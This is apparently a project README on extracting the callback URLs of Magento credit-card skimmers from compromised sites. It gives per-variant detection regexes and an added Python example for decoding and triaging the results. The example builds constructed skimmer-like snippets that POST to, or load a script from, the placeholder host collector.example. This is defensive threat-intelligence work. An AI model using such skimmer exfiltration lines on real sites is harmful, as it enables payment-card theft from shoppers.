Repository: https://github.com/fhightower/magento-callback-URLs

# JavaScript Skimmer Callback URLs from Compromised Sites

## Results
Each URL listed in indicators.md was parsed from one of the many compromised domains that had one of the JavaScript skimmer varieties listed [here](https://github.com/gwillem/magento-malware-collection) running on their website. These indicators are the URLs to which stolen credit card data is sent once it is skimmed from a website.

There are two lists of indicators in indicators.md. It is highly probable or, in some cases, confirmed that the indicators in the first list are malicious. Indicators in the second list are more likely to be false positives. I am conducting further analysis of these indicators in ThreatConnect [here](https://app.threatconnect.com/auth/incident/incident.xhtml?incident=2642112).

## Background
On Tuesday, October 4, 2016, Willem de Groot [reported](https://gwillem.gitlab.io/2016/10/04/how-republicans-send-your-credit-card-to-russia/) that the National Republican Senatorial Committee's website had a JavaScript skimmer running on it that was collecting credit card numbers and other information from anyone who purchased an item from the site. His further analysis uncovered many other domains running some variation of the skimmer. Willem de Groot created a snippet [here](https://gitlab.com/gwillem/public-snippets/snippets/28813) providing a list of sites compromised with some form of this malware. I have attempted to identify all of the URLs to which the skimmers submit stolen information. Continue to the next section to read my methodology.

## Methodology
Shortly after Willem de Groot released the list of sites running a form of the malicious code, I collected the HTML from each infected domain. I then went through each of the skimmer variants that could be easily deobfuscated and developed a regex to parse out the callback URL used in each instance of that variant. Here are the regexes I used to parse callback URLs, along with the [name of the variant](https://github.com/gwillem/magento-malware-collection/tree/master/malware/frontend) for which each regex was developed:

```
{
    "amasty.biz": "104,116,116,112,46,111,112,101,110,40,34,80,79,83,84,34,44,34,(.*?),34",
    "amasty.biz.js": "frrnq#1?--(.*?)#00#0Arpsc",
    "americanwineclub.se.js": "\('\\x3c\\x73\\x63\\x72'\+'\\x69\\x70\\x74 \\x74\\x79\\x70\\x65\\x3d\\x22\\x74\\x65\\x78\\x74\\x2f\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x22 \\x73\\x72\\x63\\x3d\\x22(.*?)\\x22\\x3e\\x3c\\x2f\\x73\\x63\\x72'\+'\\x69\\x70\\x74\\x3e'\)",
    "cloudfusion.me.js": "\"<div />\"\)\.html\(\"(.*?)\"\)\.text\(\),",
    "gate.php.js": "jQuery.ajax\({url:'(.*?)',crossDomain:false",
    "grelos_v.js": "var _0xc188=\[\"(.*?)\",",
    "grelos_v_simple.js": "Glink:.?'(.*?)',",
    "infopromo.biz.js": "http\.open\(\"POST\",\"(.*?)\",true\)",
    "jquery-code.su-charcode.js": "115,114,99,61,(.*?),34,62,60,47,115,99,114,39,43,39,105,112,116,62,39,41,59,10,125,59",
    "js-save.link.js": "\\x3C\\x73\\x63\\x72\\x69\\x70\\x74\\x20\\x73\\x72\\x63\\x3D(.*?)\\x3E\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E",
    "mage-cdn.link.js": ",\"(\\x68\\x74\\x74\\x70.*?)\"",
    "megalith-games.com.js": "frm_fill\(\"(.*?)\"\+n\),"
}
```

Two things to keep in mind before reusing these patterns. First, the capture group is only a URL once it is decoded the same way the surrounding variant is: for the char-code variants (`amasty.biz`, `jquery-code.su-charcode.js`) it is a comma-separated list of decimal character codes (`104,116,116,112` is `http`), and where the hex-escaped variants (`mage-cdn.link.js`, `js-save.link.js`) are matched against the raw page source it is a run of `\xNN` escapes. Second, watch the escaping: the patterns are written so that `\\x68` stands for the literal characters `\x68` as they appear in the obfuscated source. Pasted into a regular (non-raw) Python string literal or a JSON file, `\\x68` collapses to the regex `\x68`, which in most regex engines matches the letter `h`, not the escape sequence. Use raw strings or double the backslashes.

Here are some statistics on how many of the 4829 infected HTML samples in my dataset were matched by each variant's regex:

- amasty.biz: 1
- amasty.biz.js: 0
- americanwineclub.se.js: 0
- cloudfusion.me.js: 13
- gate.php.js: 15
- grelos_v.js: 1
- grelos_v_simple.js: 42
- infopromo.biz.js: 12
- jquery-code.su-charcode.js: 3
- js-save.link.js: 2625
- mage-cdn.link.js: 88
- megalith-games.com.js: 3

The counts sum to 2803, so these patterns leave a large share of the 4829 samples unaccounted for.
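The methodology above comes down to three steps per variant: match the variant's wrapper around the callback, capture the URL, then undo that variant's encoding of the captured text. The following is an added example, not code from this repository, that does this for four of the encoding styles in the table (decimal char-code arrays, a plain string, and two `\xNN` hex-escape layouts). The regexes are my own reconstructions rather than the author's patterns, the snippets in `SAMPLES` are constructed stand-ins that imitate each encoding rather than real skimmer code, and `collector.example` and the variant labels are placeholders. It also applies the sanity check implied by the two indicator lists: a capture that does not decode to an absolute http(s) URL is set aside as a likely false positive.

```python
"""Recover skimmer callback URLs from obfuscated JavaScript, variant by variant.

Added example, not code from the fhightower/magento-callback-URLs repository.
The regexes are reconstructions of the README's approach for four encoding
styles; SAMPLES are constructed stand-ins, not real skimmer code, and
collector.example is a placeholder host.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse


def decode_charcodes(capture: str) -> str:
    """'104,116,116,112' -> 'http'; a leading/trailing 34 (the quote) is dropped."""
    codes = [int(c) for c in capture.split(",") if c.strip().isdigit()]
    return "".join(chr(c) for c in codes).strip('"')


def decode_hex_escapes(capture: str) -> str:
    r"""'\x68\x74\x74\x70' -> 'http'."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), capture)


def identity(capture: str) -> str:
    return capture


# (variant label, regex applied to the RAW page source, decoder for group 1).
# The patterns target the obfuscated text as served, so a literal backslash in
# the page is written as \\ in the raw regex string.
VARIANTS = [
    # http.open("POST","<url>" spelled out as decimal char codes (amasty.biz style)
    ("charcode-post",
     re.compile(r"104,116,116,112,46,111,112,101,110,40,34,80,79,83,84,34,44,34,(.*?),34"),
     decode_charcodes),
    # plain http.open("POST","<url>",true) (infopromo.biz style)
    ("plain-post",
     re.compile(r'http\.open\("POST","(.*?)",true\)'),
     identity),
    # ,"\x68\x74\x74\x70..." hex-escaped URL inside a string array (mage-cdn.link style)
    ("hex-array",
     re.compile(r',"(\\x68\\x74\\x74\\x70.*?)"', re.IGNORECASE),
     decode_hex_escapes),
    # hex-escaped '<script src=<url></...' written via document.write (js-save.link style)
    ("hex-script-src",
     re.compile(r"\\x3C\\x73\\x63\\x72\\x69\\x70\\x74\\x20\\x73\\x72\\x63\\x3D(.*?)\\x3E\\x3C\\x2F",
                re.IGNORECASE),
     decode_hex_escapes),
]


def _as_charcodes(text: str) -> str:
    return ",".join(str(ord(ch)) for ch in text)


def _as_hex_escapes(text: str) -> str:
    return "".join(f"\\x{ord(ch):02X}" for ch in text)


# Constructed samples, one per encoding style above (not real skimmer code).
SAMPLES: Dict[str, str] = {
    "sample-charcode": "var a=[" + _as_charcodes('http.open("POST","http://collector.example/gate.php"') + ",41,59];",
    "sample-plain": 'var http=new XMLHttpRequest();http.open("POST","http://collector.example/gate.php",true);',
    "sample-hexarray": 'var _0xa=["' + _as_hex_escapes("src") + '","'
                       + _as_hex_escapes("http://collector.example/gate.php") + '"];',
    "sample-hexscript": "document.write('"
                        + _as_hex_escapes('<script src="http://collector.example/js/save.js"></script>') + "');",
    # Same encoding as sample-charcode but posting to a relative path: a match
    # that does not decode to an absolute URL belongs in the "likely false
    # positive" list rather than the confirmed one.
    "sample-relative": "var a=[" + _as_charcodes('http.open("POST","/checkout/onepage/saveOrder"') + ",41,59];",
}


def extract_callbacks(source: str) -> List[Tuple[str, str]]:
    """Return (variant, decoded URL) for every variant pattern that matches `source`."""
    found = []
    for name, pattern, decode in VARIANTS:
        for match in pattern.finditer(source):
            found.append((name, decode(match.group(1)).strip().strip("\"'")))
    return found


def is_plausible_callback(url: str) -> bool:
    """Triage: keep absolute http(s) URLs with a host; relative paths and
    decoding garbage go to the likely-false-positive pile."""
    parts = urlparse(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def triage(sources: Dict[str, str]) -> Tuple[List[Tuple[str, str, str]], List[Tuple[str, str, str]]]:
    """Split extracted indicators into (likely malicious, likely false positive)."""
    likely, suspect = [], []
    for sample_id, source in sources.items():
        for variant, url in extract_callbacks(source):
            bucket = likely if is_plausible_callback(url) else suspect
            bucket.append((sample_id, variant, url))
    return likely, suspect


if __name__ == "__main__":
    good, bad = triage(SAMPLES)
    for row in good:
        print("indicator", *row)
    for row in bad:
        print("suspect  ", *row)
```

Run as a script to print the triaged indicators from the constructed samples; to apply it to a directory of collected HTML, feed each file's contents to `extract_callbacks` and let `triage` do the sorting. Each variant entry pairs its regex with the decoder that undoes that variant's encoding, which is the step the regex table alone leaves implicit.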